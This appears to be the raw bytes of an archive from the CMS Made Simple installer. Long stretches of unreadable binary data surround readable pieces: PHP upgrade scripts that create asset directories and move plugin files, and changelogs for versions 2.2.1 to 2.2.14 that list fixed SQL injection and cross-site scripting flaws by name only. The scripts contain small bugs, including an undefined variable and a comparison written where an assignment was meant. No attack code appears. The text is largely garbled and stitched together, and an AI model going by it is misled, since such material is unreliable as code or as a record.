,���uv��`��c��A�·+�Ob��^D�B�gǦ���	~�[]�+�X�?��){�/y2�C��3�^��w����{�l/7m�̃U5��T�����������R*�
�<�X�Ұ<�|q������x�/������j��,dl�IQEۚ�+F�ߍ/�KC���Ÿ�(�+&W�S���C=F�����/��],x��Oa�^��f|�h�L��9���"j(��|ڤ��ZA�AtM�n)��n#]�<T��|ЬL��X��^����z��
���>^V͖&dx�������A�:�t�~�k���A�.��t�ϓd�����)�H �����nǧb+���/�!��j��"�
������~�4��2��\�R$�̿���#h�Q�v�u_�����FUXf
j����E��a��#��ԭ̷��!�P�����k��N��?�����]�z�]k��e�Cv؉�����,v�P�/A6L3X�� �Z��~�U�u838�Z���6��f�'���-��S�>��8[�X���1��ZX'U�r�j&K�b����q��`��`$!�۲k<{8y���������QA�&X�0�T�m���1�(@�.�
��z��ƂzٿȌ�eަ*z�`����k�ֲ���7��P�n\lW���!�*��ʒ�c=P �'���!�W���S��@Z�י)Ѳ�`�81�[��5nE�a���V!Ə@�}�χS8!w���b�@��A��!������O�R0 L��ibh�E�톱ι���r�P�;�SLL�C�׮�CC7#f]�pJ�t�Ã��4����e[���e�I٧�=�V/
\j�3Q-)ç�^+YW�x������~wT�[t����L��d���x�.lG�X?�����5c��~��a��G���PM5���%���ovp
iأS���]���j3@�9����']b?>������=����c/���~�=SH��bF�Պ����Kr�b"�i��D�YzB��-�Ci�Lh9��"�5}`;�px��C���bAx�z$�+#�h/.�Ǎ�޿���ND��-���*X�̜���2�D߻��2�C͑f�Ƃ��w�!�auɣZ��[V���Q0���d.�m��ɢ��O����p"����
���;E�g�=q*�^�������-���8bX1X�I�:��)<�U|��ێ�ܗ�d7@�Ol�V��pI'����{�,���#��_?�])�4xpYz������2�+��eU@y�v3��I�y<8��?�����M�~0�Aף�\Q��:����޳�
��U�f'�U�+��k`�JG[Rb��;�{�]V>�͒O�间gb!���ON� +#�	�}��m8Pf/��9 ]K��I�����[#��D0�F��X9��݅�"Rm;��]kƁ��������<����²��R7�����"��G�#���a*<�~���Gf�N	�@QR�[7�ɇ��p	�yMؤ����nL$��]��|X���c�5�,U-���b��%��F������	�o�r��˙*���i�Κb�)�
O�#�e�
?t�mK�j0^�i�zP��ϊ�`��~�3�����j��$��+�&�����nȷ�:����߯�Kn�Cє�%a���!����FX;�ó�:�T�Ď��m�-J�e�W�%@h�e[0��{6�n��T�B����l��u��t+�����aݒ�etd	0�b-k}��b])���3%v�w{h|���Ĵ��0Ţ��Ƃ7*U��{�L�f�ێb�������=U���@�U��U2F���]�o��S��}�t瓷�L�Q1G������z����~��'�m2ۤ����Y�[_���:���fl���6ʒ#x/p?�#Ŝ�,�4�kz�<`��b7�Mm�?��z�*�n!ߕt�u#�7+-���5�-��!�R9ޔ�U�$�������L�w>�hŰ�#�� j&��F�M�u��v��w�
������W> !�Ւ��u��*z���T>�E4e�<$�2��W��F��z��G�E43�Yڸ&u�W@67�f0�n��dk�)������<@�J�L�}������T$�K��E�c$�g>���P���#�
B!�4��`��?�����O��R3�*�(���R��w���2ߩ�	�x�J�'P6W�7l>�8���֍Ґ���Ku$�'�妺i<:e�y�;�@�UU�F�v�O�ʆS���#b���N�G�q�EtX=�w�H@m��قb�����vΜ���Gf����p�Ɇ8κ`�8��n�a��RG`�P0���b"�X���>��n�a��$^�b�m��;���3�_=Ti^l�@�:pW�M��7����=�"�Fk`����R|IƤH�@kz�0��S*�1u�Y��)<�`�BDd��
/?�A�/��Y�Q��v�0;E�W�x�*0ڞ��=���e��������+j7���51
���@U�.�����z��j�:�yacH^�#�j/���FpL�j%��������l�P��*��Y�'aS*�P��1����ޔcu[oi@��<�7Ƒ �F̈́�z�2H��۫y��4؀����/D'
��kmWS�1�5[x�����e�^y���DAww~|Go�s�n6
�u�!�X�<=[ݥ[����ぢ98�b:VCN�?�P�EөP+X�bn��%�|e(���e��eo�؇-v��q>䬂龈9������eO�6w͗���3����;[�n���8|�mU��C��Rbj��ݻ�(�TG�\�
��K�n6_X��/
|
�i�4�ʪ���CT؋*8^�/J�|�1�Y�ll��I�BTL(��c���y:�VZf�oL����M�q�a�+��>G�i�P��h;�+P��<X��*[����{;m�Y��
���� �%��Ҏ
���S�0���5&
�q�f4�#]���z2�\�"<m��!U0K�t mWo����}��<xb��{}�q��'� ����]��㋐��ӗ_>����
s�f�vxu�C*�M&�����_�:il�K�\(X2�tO��H���Rv�K��:k��Y�*�T�nUV�c�\&��A]�'d��/��>㟏�~�#~:}h��x�_fY�u@:ݝ�ٯ���?� 4{��/{� `M:���չ��z��e�Nc�<k	������اN��s3�'�5�u4{���b;T�Ъ��^%���wr7Y��]���j��\�Ћ����g���v�*J���1�9�z�*��*�OyfO6��C��1�Oy��Y 0'9�6�i�Or�a��ē0+k,K��	j�E[O�y����'��PX9�޺(<3ۆ����5�)���ߏۋ����X�w���z���&.j|�

8�k��w���A�o&��c�t��N{c�,"�FXOQ�S��Л�ɧ�};��C�kOd4���V܋b��&\��Z1����W��d͂Ņ׹p3�8�"(FbQ��p=��n��O=�}���~��,���v���=t�"l��`
_�u>V�?�]�r$Ǒ�"i�>i�֤��VFr�y
Ab�#��~��W�������0MTU����}������ǯ�Kq�R��:��{��{g�b&�.�,�# �Sh��_���?�}��9=���?�y��>koݑ�5��pp,�7�7q�d]����g>�OO�������/�Iμ[����G�$�lT��=�Yzd5������1��C��.hϜ�6��t&�9���Ǧy���[tw��` ت����[9V��@�.�;����������D&�=ᴉ�gEL�(������e��̽�„�`���"�/ŴF�"r�\�W�6�z?0z����;M��[
S"��'�$�{8�[�v�R������x���g�2��J��R-��Կo᛽{���I��X���;=G?b�����($)����|4g���I��e�f�hA��J��s���i^Tn��sy����۞�!XJ��BG��ɔsI������l�9\˧��p�)Dd��ڴ�0���$H�Y۳��F�|�|�����Qv�P��������}�u��x�6^�9!�m��a+����%���-�Ms��6;�e��bGג�Z1py۰~��ŝ3���d��F.���&-���&����L\�����/�Md^"$@6��r��y�aS��!f����>���\t@-���ť�E��8g��`x��~�Br�?l�=汱�37D�#�U�uܚܽ�p��<�O<��%�`{s�2�dul�Y�2���)��o����6���M*^N�ؓ�4]o~�.��?$ MY�g�����M�c��~�!��������W2a�������_n}āq�9�)�WG�����63��0����?�=OU��>L�����1o�����179��vf�\��p|d��f�T-��RX%W�=K��ݪ�u:���M���
���Fd�*\1�6��&ye�Y���<Iϱ5v�h�ī���B��V3�8�c�T���T¨���أ��^�/3&���H�%��<r	്D�Ss�[��x֐��@��3R�!�Q&���lN��$�8��vU�-��R�|i7�ئk�	�����oɾ�Ype���0R
�d�gF�1_��`���|��KV�?w=|��†a��)u}M�V��	I�_��k�`n'n��	��*���|BFf}�	5,kC����k������f?�.~�܃~/˳m
����
�NJ��s�����?����%-������(�5�BA:斉�%ˇf]�%�5��肐�kkl�����7��7�'����ʵ	���
®e�G�~��ɿ{~��:\�<^�&p6V	[�0aԄb.���׍o���������Ho���`:DŽJ�c�
�(.=dl_v�f;�_�1s{��d��fr�s�F5jռX�R�+��2��4�@I���2	��0�rQT)Ya���Yu��@�J����3�TBf�HeV��g�N�S�����+�-�Zk�	�2??�g*�{S���֑3�)��`�T�l�ty]jE��)�S����D�0A�U��Z[?a�4�����rD�;4	�\�ٓ�4S�F�K%ud
�FB���,TYu#�&F;}>��
S����ٟA.:"�+��U
������ʋ�)���!���B�$������sVgG��&�7��yՃmm�tv��M�Z�ϭ�hU��۞;��eNVa�XKCW��Ѽ_�Umd���-_80}һb��5Dl�lx#).�������l���e�@�
�\q�#[�@�sn��Ĵ���E�,�:$�Z2&@�N*c��Gl1��mq��-��$��y�$k�3�	��>�J)6ˊx�)���{��x|g�v܅��7������љ6��T^c��h�=]�ͧ\z�_�7�3K�Z4�E=��aY;]e����/��}�W��b{a,5�}`�cv5�#�}x����g��÷�ZG4>�����nv]��麘y����8h]Q�)� ð���Ͽ-��A�E������=,R%d���_^��2���
O�_C��l(�,�oP��M�.C�:q���hOjfe�<�� ���w�Y]WJ�-"7n�1���-Em20�e�G��}�T.1�_����ó�zFUw�0��/w
h��p��G������S\cZ��7���ؗf@SF3c�P�����S�S�xFY~d�	����G6���r�V�Ă�o=Y�y���L~����W��Uۂ!׎��*b�[�fa�̌H��Eّ�(K{u�.@Z�=xml�lwҮ�-�K���t4�2�;�����))[�[��δR<[�O5UW=,�'�թ������|�U�����E�m�$ѮY�
�$X����L�s��X��t�\$I*�.e;T��{>���-Fh����`f�d��ۄ5�Ks{%�JtZ���#�n�����FT�͘�N���;�/�'�͘�3w(X�윳�# �ʤ�:��:{�cG�s|C���E�M���f��~Ϩ��kћh�'���[o&SU�~�^�9��n{q��	�]3�NJ�G޾�<�^�I���ؕ�����b�cj��%T6���_~�vyD|8�=�T�T��w��zk��? �\p;R�Y�~���
��� ���?,#7s!:��ܽkYD�F��`�(1��3���yx��N��>ώ�J�	nC�XD:j�t�tH]�k��-� ���%⊍9�S��J(��jg�{�����C�܁�B���g��,��H�����P¢=�� k�F��U.wW<�K%��q��n�&3ۘ�F<�9�R�>)��2a5��W��sjt9���@�E�Ƨ��Ń��������h������\`����9RP�LB5�tNW����_��h
�Q�0yb_�0��{V����1�:򘏆�I�1�|��#Nb��q�}n��=���O���"?�Z�i�敒k<Ӷ]8���ф|��bw�ybא�U	����a���
_}��HnJ�wgZ�G;�bP3Hu���'��m'��_>
�VER�J�xӎ����᩵\^^N$(�����+!j�^7�u���<�?"#gZ�Y���3fD�Ԕ�����R��$z�|TRN�����_ȷ����c���;/'�nk���K
�R��`xj�0ӧ*�������SÕv��1��@��Q9݁��	�8�L�o���9�Eń�j�{6`!�+�5�d}t��v�F]E*�!�+�é\�x�&�E�G$�<�g\DuzJ\�d�0�{�/��w�
�xvS���)��zaG��I�����l6'���X��Ȉu)%/4Sَ�'V]��aL���ƒ�xk��s%'V�t��" 㚗�vީ�f�3�J�m&3��a��q��k}e�~�Ϗ���0�B6�`�k�0�4��gI����b��i�4�	�ω�~lг�T�-З�r��L���v�D�U��Kr	|��)]	��X�KWR0%$C\RQ�g甩[��ǥ\I��$����R�C��r$}�p`�
pW��]�&�X^�Q�H��e$�;�Ig'�`4�踀����"��	����s�{���,����/������u��j���̙he�B0�$W�"�H#S2����<�:�9�����N��r�XL�N�0��7�ٺ��W��(g�����]�Y���7ZOA�m�ڄ�?��v������[e�3w�W���[��sԤ���n��Gܽ>�G�r�K���B�C5�ZF�fm�5�g���ܵ�Τ����2�/�g �\�ݯ���ˆ���1W��G�xL��vl���:��M�&Yã�<�u3Q���Z���M�鍹��O�]�v�y�^{��-��$!��#E�+�X5�_���� �����23y$p�ޕx�V���ή�{W\o�vF�dR���z�H�S��r3�Q"�I6z*� ����RX���G������}�_��;���zAZ�ʚ���&���GO��C
�X�d'�	�\�5+�Goo�Nb�u�����§$���xv���F�6��+;j��owL��وmJxM�����2v���#��J�xP6���()$v���r�+3��	�S�R��P_�3p�t\�&�x��a�ٞ
FQWD��{�
	O�L��m����(�������,�����En�!|}��\���8G�1
�m�
��M��6UX~���Z�����ɓӦV�g�K�EWI�[1]�.�qX�6�U��ٸ4p/�6�}�+�t�Mx�D[ X�!T~���;������G�S���bƤz�l�17��A�\,��Y��uq�s�%M�ʐ0���*���ʚ���=���U�,�����ucgo�]"OIn�-��f���yQ�L��JC�I��ĭx֤�]�>��[��ω�J�?��h��8��:_��	/�S�T���HL%6y��b~���w���.	��5�6�U��T��(����iW=�l���oM��Ul�k�.L�u��z*H��]�/��I>S�I�E.Ӫ��}ډR�6�f*
�EG:st���'�*����%U�܈Ԭ)���5ϵG��"�W����kD�`��j�*~IdSv��j�b`a�rl0u���a�UE�Ux`^7A�R��'l��@�)t����@�1���ɖl�U���^�L�6������c�(oi�&��F��E�ۿ���"z��]v�ekԔ�A�p\B ���y���{�];�����ײ���8�"\됍�^/����fy
6��l%ot)eu���>�s��A��-D��g�B��>n��o�U�XB,����\=OE48&[y�N����zD3�ƴN��vq{+�zWB�N�}�rR@�IjܟK�!����qs"��GN����q��bH~�S����"��Σ<<셆��%��?��Ӳw�g>�+ �[0By'<��h�m�6+�
ű[�(ה�ߜ�o��ɔ��XƫZH
B�n����-�U��ٻ=�t|")�.
�I*v��8JR�r�c9�+5�yZ���F���B$����煗G�솹�ZGRc�v/Rrj% ��i����٢/A�����<0>�Ts����b+�$
�F:��Mr*C1�dm�%� !��6r[�	�u���-%R5ϐ8�~F<7�'R�\�r��"0A�2ʡ�M)����aڕ9Ą�	J*�.�s���l:rS뉃Y�'�
�(h�^�a��mh�$�E�(�lx͹!�̩S�{]�)-���6��Xc���SF�CuT�\�������hqb U1��t'$i�æ^�X?��2G�a��*��&&��Ǥ��k�Ŗ��%R����QYS�da��bv���c�T���b�(n�,�\gg�J�׶��A�W���꒍��i��A�e�Z�Kʯ.�՟���4�.��`'`vB�C�Y+�qC<:5?-�HFV�%
���=>�pȚ+����87)c儙׆�:���|˧�),FJ[�E�.EL���ւ���o�
�|�
̈́f5\���UQ\�N!�S��h�X�i.��-u9����E��"7-���"���!i�u'K�z�fl&XIԜ[��OU�J	N'�P
	V e̕.UF�ԪB�唱û��!�**�D�
E{Y	�a-��;QNǞ����_J��j��`�#�����@�b%}���bJ�J�x�~Ӂ�E�׮��&Ž�\��fFk��`+k���4}]B�+ �(9�
���}�J�C�k�rY��
���tTX\4�իCް C�{?(9S��HB��X�5�wW�d[XQ+F[�M�d�h:��ʼn'g�buc��)�l��ZVm��"��ԁZ�Z1U�y��jG�G�ZYun�=d}��/����G�S�෌�el�֯9!��kns��2��.�u<8[Ub�d��m��8��!�lQ��V7��L�j��77�S�"��0�YA�H�e�(��K>��j_W��%���Y6g^��~Քs���qn��:[���\X�m�f�9�X�y�W�u.�
�֘
��1�!�H*a�@�GX�l6��r�;)`H��`���NfD?�����[m�Ŧ��ܶ�( �6E��Ϙ@����[��M��O_��3<�1;|�M[�0�=�DuV���R�9�Y^��k-/5�$
�هl����/��vFH{����� �E�vAD���E�)M�C�,3Q����f���f��{H�H_�DS���`C�4T6�cu�>��O��t�����
�pɉ�2rD�_f�k�/Z%k�l�OOr��p�<���э����S����.�=���ai��)lG6�>=�����#/yĕb���c�(�{�P��C��y�,ɕ
6�R�-�5F�?�󣊗M����b�轑P�]��3ۜ�k]O�r�D�k�zreݼ''�3P`������ڿ��<�)����9���}�r�WI"`�"��=V��Z3'��~��?:E+蒪�`=�U,�f��(%^L���������N<��3�����I�]j֥}B���	���<S{��X$ZE��2`w)���B�ne�5������B�x~�_B�T��*�Amk5d{��ݟ��?�!�?"ͯwt�wg������[-��
\#��bS\��G��ؚn��%)�c�xE(i$�9���s	�s�-�Ŀ�G�S䑚Qz�]�SO̾�7tL�f�O���Sgl@�Ȧ]�Zu�l�9b�$5tz��~���χ��o]�<�l
ԃ@��c��*�OU���s/�T7�w(M�ph}�J.����G�П���؏��h�bT����mQ�>j���~z{Y�ܼ������<�R�Gg�
Ԝ�c��h���Ǐ_z]���n�*b�gW�o�K���&��N/��/K����J�T"qc`٥U�d��3S�3��pa�X���)
�1�^3{i�" c��6Z%�5�����	;�_��������n���{�^sG��)������i^ߴ��zM�{Ft�ؚC������K>��R!���o�����p=�2�S�-%j�Ir�]q֪Kf����)q�%T)��S��&x.%�d�p��[���:[���#<x�	����Pѻ������0��^<?php
status_msg('Performing structure changes for CMSMS 2.2');

$create_private_dir = function($relative_dir) {
    $app = \__appbase\get_app();
    $destdir = $app->get_destdir();
    $relative_dir = trim($relative_dir);
    if( !$relative_dir ) return;

    $dir = $destdir.'/'.$relative_dir;
    if( !is_dir($dir) ) {
        @mkdir($dir,0777,true);
    }
    @touch($dir.'/index.html');
};

$move_directory_files = function($srcdir,$destdir) {
    $srcdir = trim($srcdir);
    $destdir = trim($destdir);
    if( !is_dir($srcdir) ) return;

    $files = glob($srcdir.'/*');
    if( !count($files) ) return;

    foreach( $files as $src ) {
        $bn = basename($src);
        $dest = $destdir.'/'.$bn;
        rename($src,$dest);
    }
    @touch($dir.'/index.html');
};

//$gCms = cmsms();
$dbdict = NewDataDictionary($db);
$taboptarray = array('mysql' => 'TYPE=MyISAM');

$sqlarray = $dbdict->AddColumnSQL(CMS_DB_PREFIX.CmsLayoutTemplateType::TABLENAME,'help_content_cb C(255), one_only I1');
$dbdict->ExecuteSQLArray($sqlarray);

verbose_msg(ilang('upgrading_schema',202));
$query = 'UPDATE '.CMS_DB_PREFIX.'version SET version = 202';
$db->Execute($query);

$type = \CmsLayoutTemplateType::load('__CORE__::page');
$type->set_help_callback('CmsTemplateResource::template_help_callback');
$type->save();

$type = \CmsLayoutTemplateType::load('__CORE__::generic');
$type->set_help_callback('CmsTemplateResource::template_help_callback');
$type->save();

// create the assets directory structure
verbose_msg('Creating assets structure');
$create_private_dir('assets/templates');
$create_private_dir('assets/configs');
$create_private_dir('assets/module_custom');
$create_private_dir('assets/admin_custom');
$create_private_dir('assets/plugins');
$create_private_dir('assets/images');
$create_private_dir('assets/css');
$destdir = \__appbase\get_app()->get_destdir();
$srcdir = $destdir.'/module_custom';
if( is_dir($srcdir) ) {
    $move_directory_files($srcdir,$destdir.'/assets/module_custom');
}
$srcdir = $destdir.'/admin/custom';
if( is_dir($srcdir) ) {
    $move_directory_files($srcdir,$destdir.'/assets/admin_custom');
}
$srcdir = $destdir.'/tmp/configs';
if( is_dir($srcdir) ) {
    $move_directory_files($srcdir,$destdir.'/assets/configs');
}
$srcdir = $destdir.'/tmp/templates';
if( is_dir($srcdir) ) {
    $move_directory_files($srcdir,$destdir.'/assets/templates');
}
Version 2.2.1 - NO NAME SET
----------------------------------
Core - General
 - Improve the smarty plugin loading to handle non-cachable plugins in the /assets/plugins and /plugins directories.

Installation Assistant v1.3.1
 - On upgrade to 2.2.1 move all files from /plugins to /assets/plugins (they should only be third party plugins at this point)
 - On upgrade chmod the config.php to 444

MicroTiny v2.1.1
 - Fix temporary JS call URL.
����r1��y�<A"���]���I��pۑe���fS� o��Д$�p��cɟ��#�/�>̖����bvsq;������B��͟�n��o�����t��$���Ϧ������:
�?
m�~t)}��w�?^,�f���t�)���jIY��<���ǜ�j����yÛ�m��^�����_��I�/�\Ί�I:�Sl=��m҄[���qm�kwۡi�S~tцD�
,Y椓�!u�_ȯ��fًNY�")� �b�,�p#�u7�Rh���,*$&e��$�p�k�����ϗsjZ�LZ�O����<��0��4sq�T�c,9Yo����ݪ�y\��S{g��x.�2dWm���Sb��t���U<v��n�
f����Q+���0R�����tԾ������Rx�i�ݗu���L�P=#b�U��傅��ɕ\���k��jg.J"R�0�P(&��Xm]	�N���J����]'{+��m�����r���K!*�#�&���ɫ]��m�[�L�*TY�Sm�J&�X09
<��^ڇ׭�sP��w&#%m,{
*Q������_郫����S�����q"����e���k�l�i=���p�N�*x��|u�S��h�1Q���,�=���!9��I\8�AVY�`���������̱�<?php
status_msg('Performing directory changes for CMSMS 2.2.1');

$destdir = \__appbase\get_app()->get_destdir();
$plugins_from = $destdir.'/plugins';
if( !is_dir($plugins_from) ) return;
$plugins_to = $destdir.'/assets/plugins';
$files = glob($plugins_from.'/*');
if( !count($files) ) return;

// check permissions
if( !is_dir($plugins_to) || !is_writable($plugins_to) ) {
    error_msg('Note: Could not move plugins to /assets/plugins because of permissions in the destination directory');
    return;
}
foreach( $files as $filespec ) {
    if( !is_writable( $filespec ) ) {
        error_msg('Note: Could not move plugins to /assets/plugisn because because of permissions in the source directory');
        return;
    }
}

$remove = function( $in ) {
    if( is_file( $in ) ) {
        @unlink($in);
    }
    else if( is_dir( $in ) ) {
        \__appbase\utils::rrmdir($in);
    }
};

// move the files
foreach( $files as $src_name ) {
    $bn = basename($src_name);
    $dest_name = $plugins_to.'/'.$bn;
    if( ! is_file($dest_name) && !is_dir($dest_name) ) {
        rename( $src_name, $dest_name );
    }
    $remove( $src_name );
}

// maybe remove the directory
$files = glob($plugins_from.'/*');
$do_remove = false;
if( count($files) == 0 ) $do_remove = true;
if( count($files) == 1 ) {
    $bn = strtolower(basename($files[0]));
    if( $bn == 'index.html' ) $do_remove == true;
}
if( $do_remove ) \__appbase\utils::rrmdir($plugins_from);
@touch($plugins_to.'/index.html');
Version 2.2.10 - Spuzzum
-------------------------------
Core - General
  - Fix minor potential authenticated object insertion vulnerability in changegroupperm
  - Fix minor potential uncleaned input vulnerability in siteprefs
  - Minor improvement to get_real_ip()
  - Fix to clearing cache in cms_filecache_driver

News v2.51.5
  - Fix unauthenticated SQL injection vulnerability with the default action

ModuleManager v2.1.6
  - Fix authenticated object insertion vulnerability in the installmodule action
  - Improve ordering of the dependencies before installing or upgrading modules.
  - Adds more auditing, particularly in the cached request stuff.

FilePicker v1.0.4
  - Fix authenticated object insertion vulnerability

����n"9���)xp���E�i!�$�[�*�Ik����j�~M��X2��v��_U��,��͞�G������yv;���q>���{|������<,�#�8�ϧ7��t�6��p����q��v���~���7����h:�",Q,��D�6!��IG��a�d����t���}���#���=!��4,%d�R١ə��x	K�7��q���m����Hb#I�.�,�L�Nx��5��<m�Jvg���朮U���T�7�,
փ����9}�.i�~[rם�C���N�Ē�� ���E~���zۦ����N��,&��Ơ�P�C�rһQ�t1�$:�Rl���V�9�t�����Mק�����$L�2At� �!P��a�һ��՜V䔃P�%B,,Fi�*��mh�m�T_�v�}ߴ!�Q�T�bF
�c�xH-Q�W��/��;�s/�E)p��b�!0�
�8�xv����?���RG���9�X�
jJd��h\Ĩ�ɺ�"�k��+�;��#T��D���#&�l�*�����A�`�2.5k_���M�Cr�>�|��>@_	���bȊ8�r-�t�R�sE��W�t;�TAXق�d���C.<��W����p?�������(��Y16�~d�F����L����N��-�7�g�@V�I�F�ɪR���1�%mV�ڽ�[٭ҿ����W�Version 2.2.11 - Vulcan
-------------------------------
Core - General
  - Fix minor bug in copying content objects.
  - Minor fix to array indexes when filling params in ContentBase.
  - Fix to the {cms_filepicker} plugin.
  - Minor fix to the 'my account' form.
  - Fix error in cmsms_filepicker.js encountered in LISE.
  - PHP 7.3 fix to DataDictionary::RenameColumnSQL.

CMSContentManager v1.1.8
  - Fix an issue with copying non-core content objects.
  - Minor fixes for php 7.3.

ModuleManager v2.1.7
  - Minor exception handling improvements.
  - Minor improvement to dependency detection with modules that do not exist in ModuleRepository.
  - Minor fixes for php 7.3

News v2.51.6
  - Minor improvements for CMSMS v2.3 compatibility.

Phar Installer v1.3.8
  - Minor change to use include() instead of include_once()... not sure why.

FilePicker v1.0.4.1
  - Fix type error.

Search v1.51.7
  - Minor fixes for php 7.3.
��W�v����+���)��$ǒs-'[���	6�&���I�)�����.�^�����Ň����W_n�//�u^������ϟn/���|�맻�5Q�8�G��no./^�|:����v���i)-~z���݇���������J�N��2砂3�3��lZ����o�|���Ӟ�6�X/\Ӧ�S�7�I�j_o`�M5g�S�.c���B��*U�6�紦�i��Y.&����k�EC$�)dlM)�b�2+�;�m?&�r�v�xA(e5W!})��-"��p���c�[=�F���.g
�-SMLF�|x�tӺY���<#��a�n��S>Fς� ��Q8�IY�W,V㾏���6ܖS��-�T�:%SFk�e�ƙj�=q��ߙT�Z���!�L4�dKR��r�6yJm��p9�����k�ߣp��gMA��U�ʔ���q��!Ŏ�<�SD���#]�9�z6��~7�i�7Ԟ,����ˬd�p�H:s�A%%���k���B$pM���!g+l�ǧ��G��7�u�>���JIZ')�f��
2��g�!�gmB1{�,E@���o
�"�����>�@)�w�х!~��3���y�k�w�������#s�k�(1I�r�Y�h�@���!u��r��<JV���\_���{_]��X�B%m!��`7z���L���Yd'�5�����F@wD�N��/����l�7c�u�D4hf
��j��QJP�Q�X��X_�jFmËQ+K�0,�8�*JK�c�jh�G��D�\fk�k��>�	���[t:��Nj�$�wG�zw{�n��q��A����d�	s�$�@��zH,$�E6�;ۼ����7M[@��)c��R;v�9�*�t
c\@�$".M&"��"<ɂ�L��$�-�Q������3s�̢ZE>���*(��|`��Q��oZ���o/aT���+���~F*� ��oRY����R���+�gN�R@[D� ��$��V("3��n������yuc��`��_1K����Y/�pp69��-/p�ם�\�:�`��\&.{|#�]MUUNGITX�3�z���Q�����"�@��6)܈���8�8�>����W�mx�4Rt�20�Ga�B�"�A��X,����T��
�d 	�Ss	�E��"s{��jm�eV���c�i(<��򄼆��Lv����o@�^dX�Pp�9ۀb%Q����U��Ŀ^��9ٷ��sX��{�ͺ�~_�
���k�BH	5��f8nGl%/���|)���SG��z��:������/-'�|���=�py�l�$��gj|�@L���[+s�x1@��}��׿zM�v�oC����k���`6`�£f/b���Ё5&8&���
��~7�ͨ+X��k����\tL�Ls�N"˒���|��a��Zdx3�Uem 't�l2�$��m�z�j70/��C%�h
cf�O>�<,h;*a�_!ϟ�r3O�9 7��"QW�:i#��+���y��:���_��7W�,i�� ]����u}}zL�~X/7+��|�tu}���	'�#/=X�/yQ�^h�h����쏫�bO�����h��Version 2.2.12 - Osoyoos
-------------------------------
NOTICE: Due to the nature of the security issue fixed in FileManager after upgrading you should change your database password.

Core - General
  - Fix warning in cms_html_entity_decode

FileManager v1.6.9.1
  - Security fixes for view action.
�t��j�@��}�<A��C�B�Vh��[��٭�hĤ��}���z10�?�3EV�����y���:���B#-���;^��"z�כUU��I��$-�"O��a]M�'��W}w�~���|�i�D�Ri͉�	M��B˰S^ry�I����OM�s0o��74�!>7�#>NEֈ)c�eH�%�����T����b��1cArPF(���x���ml�����f�l���vT���q�$�B�Q�����3���w���z�Lj �$��z,� �	N��й�μT�x�f_��[��	Version 2.2.13 - Moosomin
-------------------------------
DesignManger v1.1.7
   - Fix a warning in PHP 7.3+

FileManager v1.6.10
   - Fix minor XSS vulnerabilities in FileManager.

News v2.51.8
   - Fix a security issue in the default action with the idlist param
   (This version was also separately released in the forge)
����n�0��~Gu�]и]�9�b�%Q��bw[�~ʲ�ۍ`����?Y/Vw7����V�fq_-�WFI�5W�K�f�����f{�^�Q���Iv���y�vy���Y����5�����Z�ya�Em	]�F�M�}P���"��v}|ji��4-���#fƦ��u��r�m���\y���I�r@�y/�ƨ�����<�h�3.Tڊ�A���%���?���?_0w1zC�&GFR�
K��3�~/�H	��q�sYZb^r�Mt�0g
F������v�3d���C!j-
ǬR�
����A:--���50$)�k/��6~Z����ƼB�~��$� �Hr�U^f�1�I����44���l΢�+ B���G�F9���)��e`~�_��M7ҡ����z���a|�Rx:4��m��.��<��	NF&740:A���k��t�3����	e�V�����1����©>�av����-ǟ��/���D8Version 2.2.14 - T'Sou-ke
-------------------------------
Core - General
  - BR #12280 - Add Shortcut from Shortcuts modal broken.
  - Fixes to the class.CmsAdminThemeBase.php regarding main sections title and breadcrumbs generation.
  - Explicitly add function_exists and getimagesize functions to the allowed functions in PHP secure mode.
  - Improved Error Console template.
  - Site Prefs, remove submit confirmation.
  - System Maintenance, remove confirmation update page hierarchy positions and routes.
  - cms_http_request PHP 7.4 fix "Array and string offset access syntax with curly braces is deprecated".
  - Backend users, fixed the bulk actions.
  - BR #12172 - CronJobTrait undefined constants.
  - BR #12227 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.
  - BR #12272 - Internal page link - selecting destination page problem.

AdminSearch v1.0.5
  - Remove click thru warning.
  
CMSContentManager v1.1.9
  - Fix notices in edit content template.
  - Fix notice in default admin view.

DesignManager v1.1.8
  - BR #12225 - Reflected Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.

FileManager v1.6.11
  - Don’t disable advanced mode on upgrade.
  - Fix adding double // in site root link.
  - BR #12215 - FileManager 1.6.10 crashes when trying to rename a file.
  - BR #12224 - Reflected Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.

News v2.51.9
  - Minor code fix.
  - Alert on unapproved articles disabled by default. Enable at Settings >> Options tab.
  - BR #12207 - Can't display image in news when using upload field.
  - BR #12228 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.

Phar Installer v1.3.9
  - PHP 7.4 fix "Array and string offset access syntax with curly braces is deprecated".
  - PHP 7.4 fix "Function get_magic_quotes_runtime() is deprecated".

Search v1.51.8
  - PHP 7.4 fix "Array and string offset access syntax with curly braces is deprecated".�
�W�r���+��+���NW��")e*w�*�tO�̍�>
ҒH��7��n��>}psu���ru�iy��ru��py!m��(Ļ���_�n.�����|w{y�j!�d���fyyqӶ}�������Fs�v�v��U�{�H�>,[r��P�R�B2�Xou�� ]pڪR��޶yWS���Y]��@�p���uʜ�v��>$�i�������O��;*.��F���-=)��T���8�:5_��l�XMA�-d
`a�X�R4�DP���#�mz$h��m��0�������R�"r֜��*�\�1�sBlw�0Ű	��h�E	Uq*	R�RGm��40su����~1<��hF�"�;#���e0(�HIR"���z���Dff�W��s$4���Db������6U�ɦi�j1&I�M��ff�e��oA�c��2�]C˚�����~\�r)�͖���Z%�1�♊$J�enq}��/w_V����x1j�4Sh�4�� �������=��}�"X��(��A	��!	�L����&�߳܃�����Q����NL��κ�u�{�#�q�o���um�ۦo���8�H�d֚�5��N�ʤ�S>�c=�������k�_[���ٕ�s���B
�Ni�GH0��HG��`_��}�.
'����G��΀�9A�h�aU��&y�z�_��/���~��7"��|���fQ�9�UN�.s�y��MGu3i�u�:z�"Cщ���AY���]�5�~�f�bR��᮫���ۺ��Y��X#I��P9�x!pտ���Yv��o���žX6kՄC�-��'�*-�q�8�K�Rt0��f�~�w_��_�]���-J�m7���O�5�Q���5W��υ$�)�W�~ț��~���j
�bV�P87�,�J����/~�1��~nK��V��ݜ��9fAiw4��sunSP��^`T�f�(�d��oE�Ç���a}6���I���<�2"�ma�Ҏ�,�
Fg��L%���28H�ǘ�+�d}�2r?�̇3�TҮ��f��6�Y�� �[0A$������'g�bk�&ͺȣ�{M&�L.&%�O�L�\
